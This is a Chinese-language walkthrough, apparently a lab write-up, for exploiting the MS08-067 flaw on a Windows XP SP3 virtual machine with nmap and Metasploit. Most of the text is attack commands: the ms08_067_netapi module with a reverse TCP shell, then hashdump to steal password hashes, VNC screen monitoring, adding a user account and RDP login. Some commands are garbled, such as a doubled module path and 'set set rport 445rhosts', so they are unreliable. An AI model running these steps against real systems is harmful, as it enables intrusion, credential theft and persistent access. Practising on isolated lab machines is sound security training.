Windows xp Ms08067漏洞复现

准备工作:
虚拟机
kali
Windows xp sp3中文版
先ping双方的ip,以确保双方的网络可以互通
nmap扫描Windows
命令:
cd /usr/share/nmap/scripts
nmap --script=vuln 192.168.XXX.XXX
扫描后有漏洞ms08067
Windows xp Ms08067漏洞复现_第1张图片

用mts进行攻击
先找漏洞利用:
search 08_067

运用漏洞:
use exploit/windowsexploit/windows/smb/ms08_067_netapi
看参数:
show options
Windows xp Ms08067漏洞复现_第2张图片

调整参数:
set lhost 192.168.XXX.XXX(本机地址)
set target 34(一定要设置target为34,不要让他自己识别,那样会导致利用不成功)

也可以所有参数都配置:
use exploit/windows/smb/ms08_067_netapi
set set rport 445rhosts (目标地址)
set payload windows/shell/reverse_tcp
set lhost (本机地址)
set target 34

同时靶机符合以下参数:
1、安装完成后,在控制面板中关闭防火墙,关闭自动更新。

2、设置一个文件夹共享,点击我的文档–共享文档处右键— 共享和安全—共享—在网络上共享这个文件夹(共享名可以默认)—确定

3、保证Computer Browser、Server、WorkStation三个服务是开启状态,如果利用的时候失败,这三个服务可能关闭,需要手动打开。

4、保存快照(这个漏洞有时利用成功,有时利用不成功,所以建议保存快照)

攻击靶机:
exploit

就成功获取靶机权限进入靶机:

先截个屏看一下:
screenshot

查密码:
hashdump

进入系统:
shell
看ip:
ipconfig

Windows xp Ms08067漏洞复现_第3张图片
监视屏幕:
run vnc

添加用户:
net user root123 123456

远程登录:(前提是靶机开放3389端口)
rdesktop -a 192.168.124.132:3389

你可能感兴趣的